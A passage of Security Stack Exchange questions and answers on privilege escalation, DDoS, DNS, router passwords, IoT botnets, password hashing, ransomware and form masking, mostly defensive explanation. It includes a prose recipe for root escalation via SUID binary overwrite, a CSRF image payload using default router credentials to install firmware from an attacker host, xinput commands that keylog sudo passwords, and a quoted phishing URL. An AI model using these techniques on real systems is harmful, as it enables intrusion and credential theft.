It can't be exploited remotely without another vulnerability. You need to be able to execute commands on the system already. A classic example would be a web shell. Say the server is running a web application which has a vulnerability allowing you to upload a web shell or otherwise execute system commands. These commands will typically be executed as a low-privileged user, sometimes called www-data or similar. With this exploit you could overwrite the file /etc/passwd to give www-data the UID 0. Now www-data has root privileges. However, I tried a few things and modifying /etc/passwd didn't work on my system. You can set the UID of a user to 0, but then you'd have to re-login, which isn't really an option if you only have a web shell. The best weaponized exploit I've seen so far overwrites /usr/bin/passwd , the binary which is used to change a user's password and has the SUID bit set, with shellcode that executes /bin/bash . Some limitations of the exploit seem to be: You can only overwrite existing bytes, not add anything to a file. I was also not able write more than exactly 4KB to a file. As for affecting Android, I searched the Android 4.4 git repo for the function in question ( follow_page_pte ) and got no hits, so I want to say "no", but don't quote me on that. Edit: Android is affected - see this proof of concept .
{ "source": [ "https://security.stackexchange.com/questions/140418", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15648/" ] }
140,437
In corporate environment, security examiners use filters & firewalls to block VPN connections for security purpose. VPN traffic is distinguishable and that's also the reason why openVPN doesn't work over The Great Firewall Of China. Then why not VPN channels use TLS? It'll then become impossible to predict which traffic belong to the VPN server as most of the traffic crossing filter is HTTPS to which filter has to allow.
There are a few things to undestand. The first is that most VPN tools were originally designed to provide private connectivity over networks that were insecure, possiblly natted or firewalled but not actively hostile to VPNs. The second is that traditional TLS is a wrapper over TCP. TCP is a poor choice for VPNs because it suffers from "head of line blocking". If one packet gets lost then all the data behind it is blocked until it is successfully retransmitted. This used to cause big problems when running VPNs over TCP, it's less of an issue now that we have TCP fast retransmission but it's still less than ideal. The third is that deep packet inspection is a fairly new thing. Networks that will pass legitimate TLS traffic unmolested but that will not pass other traffic on port 443 are still the exception not the rule. While Openvpn does have a TCP option it is primerally designed to run over UDP. It uses TLS for key exchange but encrypts the actual network packets using a system designed explicitly for that purpose. https://openvpn.net/index.php/open-source/documentation/security-overview.html Someone should say something about DTLS (TLS over UDP) too DTLS is a pretty new protcol. I see no reason why you couldn't/shouldn't build a VPN soloution on top of it but I guess the VPN software vendors aren't especially in the mood to redesign their software. In any case it wouldn't help with the scenario described in the question.
{ "source": [ "https://security.stackexchange.com/questions/140437", "https://security.stackexchange.com", "https://security.stackexchange.com/users/118310/" ] }
140,490
I'm a moderator of a major bulletin board. When a baddie shows up, we block their IP address; it works, at least until they find a new one. Why can't a protocol be developed for the world's routers to combat DDoS, whether by IP addresses or message content or something else, to stop DDoS in its tracks? There's clearly an answer, or else it would have already been done. Can someone give an executive summary of why it can't be done? E.g., it would require some central authority that doesn't exist.
Let's say that you run a shop. Every day, you might get a few hundred customers. One day, you get tens of thousands of people coming in, who get in the check-out line, buys a trinket, and then gets right back in line to repeat. Obviously, you are losing business from authentic customers who must wait hours in line. Now, you hire a security guard at the entrance to verify that these customers satisfy some criteria. However, there's still tens of thousands of people who want to get in. The only difference is that now, everyone must go through security. You notice that, from the authentic customer's perspective, you still wait hours in line, just that now it's just to get through security!
{ "source": [ "https://security.stackexchange.com/questions/140490", "https://security.stackexchange.com", "https://security.stackexchange.com/users/128249/" ] }
140,584
Why are the recent DDoS attack against DNS provider Dyn, and other similar attacks successful? Sure a DDoS attack can bring an entity down, and if that entity controls DNS servers then queries to those nameservers will fail, and domains listed under those nameservers will not be reachable by any host that doesn't already have IP information for them. But since browsers cache DNS records, many hosts will already have IP information for those domains (at least until their cache entries expire) and therefore the fact that the nameservers are down shouldn't matter to the hosts with caches. But this does not appear to be the case: during yesterday's attack I was unable to access github, npm, etc.
You are correct that the DNS cache would mitigate against a nameserver being unavailable. It is extremely common to have a TTL of 5 minutes or lower. Hence, 5 minutes after the DDOS attack brought down Dyn, your cache would've been invalid and you wouldn't have been able to hit github, etc.
{ "source": [ "https://security.stackexchange.com/questions/140584", "https://security.stackexchange.com", "https://security.stackexchange.com/users/109969/" ] }
140,635
I used to go on a site called blockchain.info For storing bitcoins but today when I entered the URL I was redirected to a phishing page. I have entered all my information and it was obviously sent to the phiser well Then I have realised it was a phishing page I directly reported it to block chain and changed my password my question is. Is it illegal to ddos their site? I live in KSA if that helps. Here is the phising page: http://lblockclhain.info/us/login.htm
If you do a DDoS by sending large amounts of traffic to that site, you're very likely creating a lot of collateral damage since other services in (parts of) the network will suffer as well if the network is saturated. Also, very often phishers use hacked websites (for example poorly managed and outdaged Wordpress installs) to host their phishing sites, so you're not just attacking the phisher, but also a (mostly) innocent victim of that phisher. And as others pointed out, just as in 'the real world' (which this is just as much a part of), you shouldn't take matters into your own hands. The right thing to do, is either complain to the owner of the site or the network hosting it, or report it to the website being phished. Especially banks often have dedicated teams (or hire companies) which are specialised in taking down phishing sites. In addition: you must consider that, when you are DDoS'ing a website, you're not attacking the web "per se" but the whole server, so you're causing the damage to the webhosting server (that may propagate among other websites hosted in the same server). Finally: Most laws in most countries consider illegal to send any cyber-attack, it does not matter if it is against a legal or illegal target.
{ "source": [ "https://security.stackexchange.com/questions/140635", "https://security.stackexchange.com", "https://security.stackexchange.com/users/128400/" ] }
140,720
In this hypothetical scenario, there's an input for one username, and there are two separate password fields. A user must have two separate passwords that they must enter before they can login. Would this have any benefit over a single password that's the length of password one and two combined? (I'm not concerned about ease of use for the user here)
I agree with the other answers: It add no or little entropy compared to just using a longer password (as Steffen Ullrich points out ). If you hash the passwords separately, it makes the hashes easier to crack compared to one hash of a long password (as lengyelg points out ). But I would like to add one point related to user behaviour. Forcing the user to pick two passwords instead of one will probably make the user pick worse passwords out of pure exhaustion. You will just encourage people to repeat the same password twice with some modification to evade any blocks you put in place to prevent this. When you factor in the human picking the passwords I think you end up being less secure, not more. It is just annoying without any security benefits at all at best, and directly harmful to security at worst.
{ "source": [ "https://security.stackexchange.com/questions/140720", "https://security.stackexchange.com", "https://security.stackexchange.com/users/102634/" ] }
140,760
I completely understand how IoT devices were used in the massive DDoS attacks because they are easily manipulated due to lack of firewalls, default passwords, etc. What I don't understand is although easily hacked, most IoT devices are connected to secured private wifi networks. Here's the question: So is it assumed that these thousands of IoT devices' networks were hacked first, then the device itself was hacked?
The devices are designed to be accessible from outside the home. To offer this service to their owners, they make themselves accessible through the homeowner's router/firewall. The way they do this is by sending a UPnP packet to the owner's router that tells the router to open a port that connects back to them. They then listen for connections that arrive directly from the internet. In other words, the devices first hacked their owner's routers by design, which exposed their own vulnerabilities. (This has nothing to do with secured, private, or open WiFi, other than many IoT devices connect via WiFi; UPnP exposes the exact same vulnerabilities on wired devices connected by Ethernet cables, too.) To protect yourself, disable UPnP on your router.
{ "source": [ "https://security.stackexchange.com/questions/140760", "https://security.stackexchange.com", "https://security.stackexchange.com/users/71041/" ] }
141,000
It was reported that the recent large scale DDoS attack affecting multiple websites in the US was done by hacking 10s of millions of devices and using them for the attack. How can one in general know if ones devices were hacked and used in the/an attack?
Knowing after the fact can be a bit difficult if you are not actively monitoring your network traffic. But there are some things you can do now to determine if you were at risk of being a participant and to mitigate against future participation. As has been mentioned in a number of places, if your WAN router/bridge/cablemodem/firewall has uPnP turned on, you've definitely opened up your local network to risk. You should turn this off. For your various devices, if you've left the default administrator password set, you've left yourself open. Change this. Make sure the firmware on your devices is up to date and expect further updates to come out in the near future. If you have devices that don't need to communicate on the Internet to "call home," then block them from doing such things; don't give them a default route, add firewall rules, etc. By most accounts, CCTV (e.g. web cams) were the primary devices infected and utilized. If you have such a device and a list of know offenders can be found here (https://krebsonsecurity.com/2016/10/who-makes-the-iot-things-under-attack/) , you might consider taking some action.
{ "source": [ "https://security.stackexchange.com/questions/141000", "https://security.stackexchange.com", "https://security.stackexchange.com/users/10435/" ] }
141,157
There are a lot of articles addressing the dangers of default router admin passwords . Certain security applications will also detect default router admin passwords as a vulnerability. However, these articles all focus on what could possibly happen if your router was compromised. But suppose we have a router configured such that the admin panel is only open to the local network. Furthermore, suppose that the password to connect to the network (i.e. via wifi) is sufficiently secure (i.e. very high entropy), and only trusted users are allowed on the network. Under these conditions, could the router still be compromised? Is there still a need to change the default router admin password? My thoughts are that if an attacker can't get into the network, they can't compromise the router regardless of the router's admin password. CSRF is a possibility, but that can be defended against with CSRF token. Are there any other possibilities I haven't considered?
Is it dangerous to use default router admin passwords if only trusted users are allowed on the network? Yes, it's dangerous. Here are a few more "technical" ways to do it (other than saying it's bad): 1. No CSRF Protection You could be happily visiting a website, and there could be any number of issues with it: The website itself was haxored and has malicious content inserted in it, or; Any of the elements on the page have been MITM in the middle attacked (shut up, I'm trying to be funny) and have had elements intercepted with The Thing(tm), and; CSRF attack was inserted by style, img, link, or anything else: Rough example: <img src="http://admin:[email protected]/updateFirmware.cgi?file=hxxp://hax.com/hax.bin&confirmUpgrade=true"/> In many cases, the CSRF protection won't help if you can log in with admin:admin@routerip through a link like that. It will create a new session and token for you instead of using your current one. Congratulations on your newest installation of Router Backdoor(tm) with full shell access. 2. CSRF protection exists, but not Proper XSS Protection Escape context and insert hax.js , or just JS code which could perform the following functions: Steal CSRF token with javascript See <img src=""/> above. Also, .svg images can bypass a lot of XSS protection. 3. Router configuration page is accessible via the wireless network? Someone logs in to your wireless network, visits the router configuration page and makes necessary changes/upgrades the firmware/redirects DNS/whatever they want. Like the first one, but with a point-and-click interface instead. 4. Other ways Disgruntled employees If anyone finds their way on your network through another compromised machine, they can use that machine to compromise your router and then you're boned. Keep in mind, XSS/CSRF attacks could exist, or even be added during upgrades, if the vendor is crap. So don't do it. Please. My heart can't take it. :(
{ "source": [ "https://security.stackexchange.com/questions/141157", "https://security.stackexchange.com", "https://security.stackexchange.com/users/87241/" ] }
141,250
I just learned a few things about hashing algorithms – MD5 and SHA-1. So, if I am not wrong passwords are hashed so that in a rare situation of your database being compromised a hacker can not see all the passwords in your database as the passwords are hashed. MD5 is not safe anymore as most of the common passwords and their hashed values are out on the internet. And hence people now use other hashing algorithms. So, my questions are : Is hacking a database that easy? I mean instead of finding new ways to hash, why can't they make their database more secure or "hack-proof"? If a hacker manages to hack into some database, why would he want to know the hashed passwords? I mean he can change other columns of data. For example, he could search for his username and increase his bank balance. So, shouldn't all the fields be hashed?
Some things first: Forget about MD5 immediately. It's old and weak. Ideally, forget about SHA1 too. There are SHA2 and SHA3. This hash algorithms in their pure form are useful for many things, but not for passwords. Use them in combination with eg. PBKDF2, or use bcrypt (and don't forget salting). So, if I am not wrong passwords are hashed so that in a rare situation of your database being compromised a hacker can not see all the passwords in your database as the passwords are hashed. Correct. While this won't help making your server more secure (after all, it's already compromised in such a situation), it prevents eg. the attacker using the passwords on other sites. Sadly most people use one password for multiple things. Is hacking a database that easy? I mean instead of finding new ways to hash, why can't they make their database more secure or "hack-proof"? You could (and you should). But: Even with all your efforts, there always is some chance the attacker can get access. Bugs in software and devices you don't know about and/or you can't fix, and many more things. Often you can't give your best because of managers who don't think security is important, have no budget for it etc. If a hacker manages to hack into some database, why would he want to know the hashed passwords? I mean he can change other columns of data. For example, he could search for his username and increase his bank balance. So, shouldn't all the fields be hashed? If all fields are hashed, the database is useless for you too; so you can't do that. Remember, a good hash can't be reversed. As said above, as soon as your DB/Server is compromised, the damage for you already happened. The hashed passwords just prevent that the attacker gets access to other accounts of your users too (and then some users would sue you, so hashing helps you too).
{ "source": [ "https://security.stackexchange.com/questions/141250", "https://security.stackexchange.com", "https://security.stackexchange.com/users/128915/" ] }
141,262
I'm working on an indicator for Ubuntu, and one of the tasks it's supposed to perform is chmod -x and chmod +x a specific root-owned binary ( /usr/lib/x86_64-linux-gnu/notify-osd to be precise). As far as I understand, my options are: run command with pkexec each time ( which I kind of want to avoid for the sake of user experience ); since the indicator is in python, I could have a binary with setuid bit set written in C. However, I've been told this approach is frowned upon; start a "proxy" which will run as root and only perform that one specific task , and the indicator will communicate with that "proxy" My question really is , which approach would be best in terms of security AND user experience ? How should I approach implementing an app that needs one, very specific task to be done as root , and the rest - as regular user.
Some things first: Forget about MD5 immediately. It's old and weak. Ideally, forget about SHA1 too. There are SHA2 and SHA3. This hash algorithms in their pure form are useful for many things, but not for passwords. Use them in combination with eg. PBKDF2, or use bcrypt (and don't forget salting). So, if I am not wrong passwords are hashed so that in a rare situation of your database being compromised a hacker can not see all the passwords in your database as the passwords are hashed. Correct. While this won't help making your server more secure (after all, it's already compromised in such a situation), it prevents eg. the attacker using the passwords on other sites. Sadly most people use one password for multiple things. Is hacking a database that easy? I mean instead of finding new ways to hash, why can't they make their database more secure or "hack-proof"? You could (and you should). But: Even with all your efforts, there always is some chance the attacker can get access. Bugs in software and devices you don't know about and/or you can't fix, and many more things. Often you can't give your best because of managers who don't think security is important, have no budget for it etc. If a hacker manages to hack into some database, why would he want to know the hashed passwords? I mean he can change other columns of data. For example, he could search for his username and increase his bank balance. So, shouldn't all the fields be hashed? If all fields are hashed, the database is useless for you too; so you can't do that. Remember, a good hash can't be reversed. As said above, as soon as your DB/Server is compromised, the damage for you already happened. The hashed passwords just prevent that the attacker gets access to other accounts of your users too (and then some users would sue you, so hashing helps you too).
{ "source": [ "https://security.stackexchange.com/questions/141262", "https://security.stackexchange.com", "https://security.stackexchange.com/users/121824/" ] }
141,311
Am I right in my conclusion that validation of a certificate by a client that wishes to communicate with a server that offers said certificate, is done completely local? As in, the client is supposed to have all information (eg. CA's public key, used to sign the servers certificate) already locally available? The exceptions being, I think, comparing the ip address/dns information offered through the certificate with the real world servers address and domain name. An answer in another question ( SSL Certificate Trust Model ) in fact explictely states "In fact that's the whole idea of certificates: to allow offline validation.". Is that true?
It is almost true. :) But not entirely. A certificate can be revoked in case of a compromise. The only way to discover if a certificate is revoked at any given time is basically contacting the CA that issued it. Any info signed in the certificate itself (fit for offline validation) will be valid for a revoked cert. There are two protocols for checking revocation, CRL and OCSP. A CRL is just a list of revoked certificates published by the CA, and OCSP is kind of a web service, but the idea is the same, any client doing cert validation should have a look and check if the certificate happens to be revoked. In fact, a fairly common flaw in cert validation implementations is that they don't check revocation.
{ "source": [ "https://security.stackexchange.com/questions/141311", "https://security.stackexchange.com", "https://security.stackexchange.com/users/69750/" ] }
141,413
Should the sole user of a *nix (particularly Linux and MacOS) have two accounts, one with sudo privileges and one without? Years ago I read that on your personal computer you should do your daily tasks as an unprivileged user and switch to a privileged user for administration tasks. Is this true? Note: I am not referring to whether or not you should log in as root for daily use. That's obviously a bad idea, but should your daily use account be able to use sudo? Second note: I am specifically referring to personal devices that are not being used as servers or to host any functionality for remote users.
Updated dramatically after 69 upvotes, see answer history for original answer. Thanks to @JimmyJames for the discussion . First, let's talk about threat model: what are you trying to stop the potential attacker from doing? Threat model: identity theft / ransomeware on a single-user system Generally for end-user systems the de facto threat model is identity theft / ransomware. If the attacker has access to your documents and/or can run shell commands as you, it's game over. From that perspective, root access doesn't gain the attacker anything; they can get what they want without it. If identity theft / malware is the only thing you're worried about, then it doesn't seem like it matters much whether your user has sudo powers, or ever whether the browser is running as root. (I should also point out that malware / connecting you to a botnet can happen without root access since login scripts / scheduling a cron job does not require root). Randall Munroe at XKCD seems to agree with this view : Lastly, I'll add this disclaimer: Yes, I'm aware that this goes against the general public opinion that "more security is always better". It's just not true. Sometimes more security is worse, like overly complex password policies that end up forcing people to write down their passwords. You always have to look at the risks and decide how much security is actually appropriate. In this case there's no harm to locking down root access, but you are making your life more complicated and it's not clear that you're gaining anything from it. Threat model: root access or multi-user system If you have a threat model where the attacker wants something that only root has access to, or there is more than one user account on the machine, then the answer actually depends on which *nix you're talking about. This is quickly getting away from personal computer cases and into server cases, but I'll discuss anyway. For linux, because of a bug (*ahem feature*) in the Xorg windowing system, your everyday account should probably not have sudo powers. For operating systems that don't use X, it's probably ok. Linux (running X.org window system) Here's a great article that shows you how to log all keystrokes on a gui linux machine using a simple user-land (non-root) shell command. In summary: $ xinput list shows you all connected human-input devices $ xinput test <id> starts echoing all keystrokes on the selected device. I tested and I get logs of the password that I type into sudo in a different terminal window. If I lock my computer then when I log back in, I see logs of the password I typed into the lock screen. Apparently this is not a bug in X, it's a feature. Right, I'm gonna go hide under my bed now. So yeah, this supports the idea that any user you log into in the gui with should not have sudo powers because it's trivial to log your password and then become root. I suppose you should have a dedicated account for sudo ing and switch to a TTY terminal ( ctrl+alt+# ) when you want to use sudo . Whether or not this is worth worrying about is up to you: personally, all the data I care about is already there in my user account, but I probably will change my laptop setup because I'm a security nerd. Note that in my tests I was not able to keylog across users. Doing "Switch Account" in the gui, or startx in a new tty terminal seems to launch an isolated instance of X. Thanks to @MichaelKjörling for this observation: That's one of the things that Wayland [windowing system designed to replace X] actually tries to fix (see the bullet point on security). Remember that X11 originated at a time when the threat model was hugely different from what it is today. For sysadmins : this reinforces the habit of only interacting with your Linux boxes over ssh, never use the GUI. Mac OSX I'm not an OSX expert, but I know that it does not use the Xorg server so I would assume that Apple's GUI handles this properly, but I would love for someone more expert than me to weigh in. Windows I'm not a Windows expert either, but I believe that the User Account Control (UAC) feature introduced in Windows 7 addressed this by having admin prompts render in a secure desktop whose input busses are isolated from your regular desktop.
{ "source": [ "https://security.stackexchange.com/questions/141413", "https://security.stackexchange.com", "https://security.stackexchange.com/users/129232/" ] }
141,545
Two input authentication uses both username (may be available publicly) and password (kept secret). For the sake of comparison, assume the length of username is the same as the length of password, i.e., n characters. Also assume we can only use case insensitive letters from a to z. If both username and password are kept secret then at most we need 26^(2n) trials to pass the authentication. Now consider a new authentication system with only one single input, i.e., password that is kept secret of length 2n . The allowed characters are case insensitive, spanned from a to z. This system also needs 26^(2n) trials to be passed. Questions Why don't we use single input authentication?
When signing up for a service, you have a good chance of getting "This name is already in use, choose another" - or something to that effect. In the system you propose, this would tell you that the access code is in use - great, open a new browser and log in with this access code! You've just hijacked somebody else's account. You could find any number of existing access codes, just by trying to change your own. Also, what if you forgot your access code? This can be mitigated if the system knows your e-mail address and can send you a new access code, but then you'd be close to a two-input authentication; you might as well use your e-mail to log in then.
{ "source": [ "https://security.stackexchange.com/questions/141545", "https://security.stackexchange.com", "https://security.stackexchange.com/users/129390/" ] }
141,701
When ransomware searches the victim's files in scanning step, how can ransomware know the types of files? It can check the file name (e.g. book.pdf ) or file signatures. What I'm wondering is when I change the extension in my file's name (say, book.pdf --> book.customEX ), I think that ransomware should not be able to find my files, so encrypting files also cannot be done. Can I have some opinions or advice?
First off, not all ransomware are created equal: just like any software, some ransomware is well-written, while some are poorly-written. You can get an overview of major ransomware variants on wikipedia/ransomware . Some ransomware - notably CryptoLocker - do use lists of file extensions to decide which files to encrypt, and why not? Users knowledgeable enough to change their file extensions probably have backups and won't pay you anyway. As @usr points out, you can still get a lot of people with simple approaches. That said, some ransomware, like CryptoWall, is very sophisticated, and while I don't know how it works, I can speculate on what's possible. As you say, files often contain a "file signature" - a short hex code near the start of the file that indicates what type of file it is. Here are two lists of these "magic numbers" from Wikipedia: [1] , [2] . The Windows OS itself relies quite heavily on file extensions in the file name and is notoriously brittle if you change it, but that doesn't mean all software needs to be so terrible. For example, there's a standard Unix utility called file that will look at the magic number and tell you what type of file it is, there's no reason ransomware can't do the same.
{ "source": [ "https://security.stackexchange.com/questions/141701", "https://security.stackexchange.com", "https://security.stackexchange.com/users/129525/" ] }
141,706
In my personal life, I use KeePassX to generate/store all my passwords. I have seen some people use a password protected OneNote section. Does the password protected OneNote section provide a comparable level of security to KeePass? Or is the password protection a farce?
As far as storage is concerned, I think that any correctly encrypted file will have same level of security. The problem is that passwords are meant to be used, and then dedicated password vaults have more features: ability to simulate key presses to avoid storing the password in the clipboard - and additionaly allows to use them on poorly designed web site that disallow to paste in the password field even if the clipboard is used, it is cleaned after a short time to prevent the password to be inadvertantly pasted in a wrong place some password managers include a password generator (keypass does) able to generate random passwords with high entropy - resistant to dictionary attacks For all those reasons, I think that a good password manager is better than a simple encryted file, even if the crypto engines are equivalent.
{ "source": [ "https://security.stackexchange.com/questions/141706", "https://security.stackexchange.com", "https://security.stackexchange.com/users/129534/" ] }
141,812
Websites like Amazon and eBay sell USB data cables for a pittance, often of unknown or dubious provenance. Should I be wary of using these cables to transfer data to or from my devices? Is it possible (and plausible) that they have a malicious payload that can compromise the security of the host device?
Do you have reason to expect targeted attacks? It's reasonable to assume that random cheap cables sold in large scale generally aren't modified to include offensive hardware, mostly for two reasons: That would raise the cost of the cable far above its price, and would be uneconomical even considering the ability to "monetize" a certain amount of random untargeted computers owned by the attack, so there are no good economic reasons for attackers to do this. We would have noticed such an attack. While most people wouldn't notice, if this was a mass attack, there would reasonably be some detection of that. Malware that tries to randomly hack many, many computers has obvious problems staying undetected for long. However, if you have some reason to expect targeted, expensive attacks aimed to compromise you by people who have no qualms to perform illegal actions, then it certainly is a possibility that the hardware you receive is "special". However, that's not limited in any way to cheap USB data cables, or USB data cables - reasonably similar attacks would apply for any device you purchase in the same way, from mice/keyboards to laptops or server hardware. How do you know that your computer didn't have a hardware / firmware backdoor installed when you bought it? If you have reason to expect such risks, you have to treat your USB data cable purchases in a similar manner as all other sensitive hardware; for example, ensure that you buy an item that cannot possibly be "adjusted" especially for you, e.g. random purchase of a generic item from a store shelf instead of a remote order that will be mailed to your address.
{ "source": [ "https://security.stackexchange.com/questions/141812", "https://security.stackexchange.com", "https://security.stackexchange.com/users/4731/" ] }
141,868
So far as I know, password boxes and PINs are always obscured in some way in order to prevent people from looking over your shoulder when you enter it. However, other important information that I type into a web form (credit card number, social security number, etc.) that I would also like to protect from rubbernecking is hardly ever obscured. As a concrete example typing your login password into Steam or Amazon is properly blanked out but typing in your credit card number when making a purchase is revealed as plaintext. Intuitively, it feels like you would want to blank anything that could be stolen, credit card info included. Is there any particular reason why only passwords and no other sensitive data is usually obscured?
I don't think this is about secret vs sensitive information, eg "secret information is masked and sensitive isn't." (the distinction is problematic; many secrets need to be shared too). I think cc and ssn information isn't blanked for several reasons. They're not hard fact, but still, here are a few: Doing what everybody else is doing, not surprising the user. Passwords came long before web forms and were already masked. So when they were used in login forms, they were masked too. When online business and administration came along, prior art (paper forms) required unmasked entry of sensitive information (obviously), so web forms made the same choice. It would be very easy to make a mistake and enter a wrong number if you didn't see what you typed. In the case of a wrong password, this is only mildly annoying and you get instant feedback; in the case of other wrong sensitive data, this might have further consequences which isn't immediately clear (such as a request to a government office being denied because of a wrong SSN or a payment not going through - although in the cc and ssn cases, this is usually hedged against by looking if the checksum is right and providing immediate feedback if it wasn't) Many people don't know their cc number from memory and copy it down from the actual credit card. So the number is there to be seen by a bystander anyway; blanking the entry field wouldn't help much to protect the number at the client end and thus doesn't merit the additional difficulties caused by 2. Impact - A stolen cc number doesn't necessarily have the same impact as a stolen password, especially if you consider that information stolen by looking over your shoulder would most likely be stolen by people who know you (collegues at work, family members, classmates etc) and want your password for a very specific reason that would have personal consequences. OTOH, even if they were interested in your cc number, you wouldn't have to take the financial damage because the cc company would probably cover it. For the same reason, you don't mind letting a waiter or store clerk see your credit card, even though he could copy it and sell it to someone else... Number 4 may not apply to other kinds of sensitive information, though.
{ "source": [ "https://security.stackexchange.com/questions/141868", "https://security.stackexchange.com", "https://security.stackexchange.com/users/126240/" ] }
141,925
How do I trust that I am typing my password for Google when I'm using a Safari web view in an any iOS app?
How do I trust that I am typing my password for google You do not. Apps should allow you to do that through actual Safari browser in another window, where you can see the address bar.
{ "source": [ "https://security.stackexchange.com/questions/141925", "https://security.stackexchange.com", "https://security.stackexchange.com/users/80238/" ] }
142,110
I'm working on a small side project which involves a browser add-on and a backend service. The service is pretty simple. Give it a URL and it will check if the URL exists in a database. If the URL is found some additional information is also returned. The browser add-on forwards any URLs that the user opens to the service and checks the response. Now, sharing every URL you're browsing is of course a big no-no. So instead, I was thinking about using SHA1 (or similar hashing function) to create a hash of the URL, and only send that to the backend service to check for membership in the DB. My question is whether this scheme is better for the users privacy. My thinking is that now I'm not sharing any URLs, and the only way I know the user has opened a given URL is if it's already present in the database.
It's better but not perfect. While it is (currently) impossible to get the URL for a given hash, of course every URL has the same hash. So it is not possible to see all the URLs a user browses, but it is quite likely to get most of them. While it isn’t possible to see user A visits HASH1 and conclude that HASH1 means fancyDomainBelongingToUserA-NoOneElseVisits.com , it is for example possible to just calculate the hash for CheatOnMyWife.fancytld and then see which users visit that site. I wouldn’t consider that to be protecting the users privacy. Also just matching users who visit a lot of similar domains can be pretty revealing.
{ "source": [ "https://security.stackexchange.com/questions/142110", "https://security.stackexchange.com", "https://security.stackexchange.com/users/129951/" ] }
142,127
I'd like to ask you what should be satisfactory result of pen-testing job? My main concern is that pen-testing is hard and it won't always result in gaining remote shells or roots. However, it is much easier to list potential vulnerabilities. For example, if there's PHP version 4 from 2007 I can list it as potential vector but I may be unable to exploit it. Is successful exploitation a requirement for pen-testing job? Would vulnerability scan be good result of the job as well if there's some successful exploitation included (but accounts for less than 1% of all possible issues).
As someone who contracts pen-testers more than I act as a pen-tester, what I'm looking for is that you did more than run Nessus/ZAP/Burp - I can do that myself (though I expect that you do that as well). I expect you watch the dataflows in the app/website and look for those loose threads that indicate there is a logic error that might be exploitable. I expect that you are able to tell me what you can glean from the outside, that you can tell me things that cause concern that couldn't be found with a scan. I'm looking for indications that you looked at, for instance, password reset screens and considered whether the flow is exploitable. I want to see that you've considered whether privileged information is available to unprivileged users (ie, is the app just using css to hide it or something daft like that). Ideally, I've done the easy stuff before I contract you - I've done the scan, I've done the patches and I've picked all the low-hanging fruit. I hire a pen-tester for the hard stuff. Really, if you don't manage an exploit, I want to see that you've worn your fingernails down scratching at the outside looking for a crack.
{ "source": [ "https://security.stackexchange.com/questions/142127", "https://security.stackexchange.com", "https://security.stackexchange.com/users/117212/" ] }
142,237
Occasionally (though rarely), some of our users say that their password doesn't work: they say that they have typed the correct password but got the 'wrong password' message. We tell them to use the reset password feature, which they do, but they stay with that feeling that the authentication system sometimes doesn't work . Our guess is that their password is not what they remember, but since we don't store it in plain text, do we have any way to prove that's the case? On some occasions we were able to show them that on a certain date they had changed their password and then forgot about it, and they were satisfied. But that's not always the case.
There's not a really quick way to prove this because the hash is designed not to be reversible . You could take their claimed password, and manually generate the hash as @TechTreeDev suggested . You should be using a salted hash (i.e. BCrypt) so make sure you use the same salt. If the manually generated hash matches, then you've proved an issue in the login code. More likely the generated hash will be different, then you've ruled out login code issues , but there still could be an issue with the password setup , or a mistake in your manual generation. That's pretty much the extent of what you can do to check a single person's password. Beyond that we get into system testing. If you suspect an intermittent/random chance edge case, you could create a monkey test script to set up passwords and then try them. This approach is probably overkill though. The best thing is to review your login code and all points that reset the password . The code should be as short and concise as possible. In my experience, the best way to rule out edge case issues is with code review, as such edge cases are often not covered by manual testing. A few things to specifically look for: Make sure that maxlength setting is consistent (or better yet, not present) on any password <input> s. You are looking for consistency between password set up and the login form. Make sure there is no server-side truncation . Make sure that encoding is consistent. If a non-ASCII character is used in the password, the password setup form and login forms need to behave exactly the same. Also don't automatically strip anything like whitespace or non-ASCII characters from the password. This is the kind of thing you can easily catch with a code review if your code is concise. Finally some human tips: Verify they are using the correct username first. Check the caps lock setting is correct. Give the customer support folks a log of every date/time of login or of password reset. If there has been at least one login since the last reset then they know the system worked correctly. As long as the login code is unchanged, and the hash is unchanged since last success, then you can be reasonably certain that the issue must be a mis-typed password. Review the UX of the Wrong Password error , providing the user with some simple tips and authoritative explanation of possibilities. This may reduce call-ins to customer service. It may be helpful to email notify the customer when a password is reset to remind them. (or other family member in case of shared accounts)
{ "source": [ "https://security.stackexchange.com/questions/142237", "https://security.stackexchange.com", "https://security.stackexchange.com/users/83914/" ] }
142,385
A website "broke" after I changed my password to something like "NÌÿÖÏï£Ø¥üQ¢¨¼Ü9¨ÝIÇÅbÍm". I was unable to log in, and customer service deleted my account and had me create a new one. Does this imply security flaws in the site's code? Should I worry about my credentials? Obviously I'm using a password manager, and the website only allows me to reserve seats in a cinema, so the credentials are not of much value.
Your description is that the site fails to properly validate their input. This (weakly) implies a deep flaw in their code. If your input had simply choked their routine that calls PBKDF2() , then your password hash might not have been reproducible; but I would expect a simple password reset should have been adequate to clear up that problem. Deleting your account might indicate that your account record was corrupt; however, deleting accounts might simply be their response to anyone who has a password problem due to unexpected user input. They might even be trying to actively thwart hackers with this response. Also, flawed doesn't necessarily mean their site is vulnerable. The defective code would need to be exploitable, and you didn't supply evidence of that. Such evidence might include erratic behavior or inexplicably changed values. If you decide to press further, perhaps testing individual password characters to isolate the glyph that caused their site to lock your account, know that they would be within their rights to consider those attempts to be a hacking attack. Seek the site owner's permission before experimenting. Note that if instead of using high-bit-set characters, you construct your password from 16 cryptographically random, high-bit-unset, standard, ordinary, printable ASCII alphanumeric characters, the practical difference to your password's security will be irrelevant.
{ "source": [ "https://security.stackexchange.com/questions/142385", "https://security.stackexchange.com", "https://security.stackexchange.com/users/92207/" ] }
142,496
I have a static web site. Users cannot log in or perform any other actions. Which of the common HTTP security measures make sense for my site? Do I need any of these? HTTPS Strict transport security Content security policy Certificate pinning Clickjacking protection Content sniffing protection
